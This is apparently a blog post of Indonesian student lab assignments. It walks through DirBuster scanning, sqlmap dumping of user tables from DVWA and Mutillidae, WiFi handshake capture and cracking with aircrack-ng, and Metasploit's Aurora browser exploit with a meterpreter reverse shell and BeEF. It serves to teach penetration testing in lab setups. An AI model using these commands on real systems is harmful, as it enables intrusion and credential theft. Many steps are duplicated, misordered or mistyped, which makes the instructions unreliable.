"MENGGUNAKAN DISBUSTER.
1. buka aplikasi
~pilih parrot~pilih web aplikasi~pilih web crawles~klik dirbuster
2. klik tulisan browser
3. pilih tulisan atau tanda (/)
~usr klik open
~share klik open
~dirbuster klik open
~ wordlists klik open
4. pilih tulisan directory-list-2.3-small.txt klik select list.
5. copy alamat yang ada dibrowser(contoh pada sql injection).

6. klik start dan lihat prosesnya apabila sudah medapat informasi maka laksanakan perintah stop.
TUGAS SQLMAP INJECTION DVWA

2. selanjutnya buka bruptsuit lalu aktifkan proxy kemudian pada dvwa submit maka akan ditampung usser ,paasword dan id

3. stelah diats lalu klik kanan pada proxy kemudian pilih scan to file, setelah itu beri nma id yang diproxy dengan nama very.txt contohnya
x
4.lalu buka sqlmap
dengan -L/root/perco.txt untuk mengetetahui file berada,
dilanjutkan buka sqlmap -L/root/perco.txt --dbs
5.setelah dienter akan muncul sebagai berikut
sudah masuk pada database
6. masukan printah sqlmap -L /root/perco.txt --dbs -D dvwa -T users --columns ,untuk menampilkan kolom dari database
7. setelah itu masukan printah # sqlmap -L /root/perco.txt --dbs -D dvwa -T users --dump untuk menampilkan useer n password ,id yang dicari
8. password sudah ada tingal dibaca lagi aircrack
tugas sqlmap
1. buka menu pada dvwa kemudian pilih salah satu dari 10 menu pada dvwa yaitu sql injection

2. selanjutnya buka bruptsuit lalu aktifkan proxy kemudian pada dvwa submit maka akan ditampung usser ,paasword dan id

3. stelah diats lalu klik kanan pada proxy kemudian pilih scan to file, setelah itu beri nma id yang diproxy dengan nama very.txt contohnya
x
4.lalu buka sqlmap
dengan -L/root/perco.txt untuk mengetetahui file berada,
dilanjutkan buka sqlmap -L/root/perco.txt --dbs
5.setelah dienter akan muncul sebagai berikut
sudah masuk pada database
6. masukan printah sqlmap -L /root/perco.txt --dbs -D dvwa -T users --columns ,untuk menampilkan kolom dari database
7. setelah itu masukan printah # sqlmap -L /root/perco.txt --dbs -D dvwa -T users --dump untuk menampilkan useer n password ,id yang dicari
8. password sudah ada tingal dibaca lagi aircrack
1. pertama buka mulltilidae pilih menu info login
2.actifkan brupsuite dan kemudian masuk ke proxy. dkemudian blog dan copy diats GET dan useer password
3. buka terminal dan masukan blog alamat GET ke terminal
4. enter ,maka akan kluar
tentang dtabas
5. masukan printah dibawah maka akan kluar
6. masukan printah lagi akan keluarr columns
7. maka kolom akan terbuka
8.setelah itu masukan printah lagi untuk masuk didalam kolom lagi
9. setelah itu ,maka akan keluar password dan useer
2.actifkan brupsuite dan kemudian masuk ke proxy. dkemudian blog dan copy diats GET dan useer password
3. buka terminal dan masukan blog alamat GET ke terminal
4. enter ,maka akan kluar
tentang dtabas
5. masukan printah dibawah maka akan kluar
6. masukan printah lagi akan keluarr columns
7. maka kolom akan terbuka
8.setelah itu masukan printah lagi untuk masuk didalam kolom lagi
9. setelah itu ,maka akan keluar password dan useer
TUGAS HACKING WIFI
1.masuk terminal kemudian masukan printah airmon-ng start
wlan0
2. kemudian masukan printah #airmon -ng start wlan1
3.akan muncul siapa aja yang masuk kedalam terminal kita melalui gelombang radio
4. setelah tau adres target yang mau dituju ,asukan printah #airdrup-ng -c 11 -b masukan no adress target -w very.cap
5.akan muncul seprti dibawah lalu masukan printah # aircrack-ng very.cap-01.cap -b alamat adress target -w/usr /share/sqlmap/txt/wordlist.txt
6. setelah itu akan keluar handchake bahwa sdh bersalamn ke target
7. masukan printah #aireplay-ng -a ip adres target -e "bolot 49"
- -ignore- negative -one wlan1
8. masukan printah # locate wordlist
9. pasword sudah ditemukan ,kemudian tingal log in untuk masuk sbg user biasa

TUGAS Client Server Attack
2. to exploit in Windows via the browser type command use exploit / windows / browser / ms10_002_aurora on terminal exploit

3. type the command show option to determine what fields will be filled

4. set SRVHOST with us here I use the ip ip 192.168.56.1 so I would type on the terminal set SRVHOST 192.168.56.1
5. URIPATH set the path name that we want, here I use the path of the richest people in 2015 so I would type on the terminal set URIPATH orang_paling_kaya_tahun_2015.html
6. The next step in order to adjust the payload that gives a chance after the target enter the web address into the browser to directly connect to us that by typing in the terminal exploit is set payload windows / meterpreter / reverse_tcp_dns
7. set LHOST with us here I use the ip ip 192.168.56.1 so I would type on the terminal set LHOST 192.168.56.1
8. because we likened to a virtual box is the target, then we open the windows xp virtual box that is in us
9. open internet explorer
10. execute the exploit through the terminal
11. enter the address shown on the terminal into the web address lookup
12. to know we're connected with windows xp can directly typing sessions -l in terminal
TUGAS EXPLOIT WITH CLIENT ATTACK AND BEEF
2. it will open iceweasel by itself and will ask login password and password beef with beef
3. Open a new tab in the terminal and enable apache 2
4. Open a new tab in the terminal and activate exploit
5. create a command in the terminal exploit to attack meterpreter through client service
6. Open windows xp which is in virtualbox
7. run the exploit
8. Open Internet Explorer and go to a web address index.html
9. open on the icebrowser and we have to connect to the target web server
10. of beef we exploit the target to visit a web address that we provide to meterpreter targets.
11. Then, enter -l command session to view the sessions that have been connected with the target
12. The session then type the command -i 1 when the target is connected to session 1
13. then the target has been connected with us through meterpreter
















































Tidak ada komentar:
Posting Komentar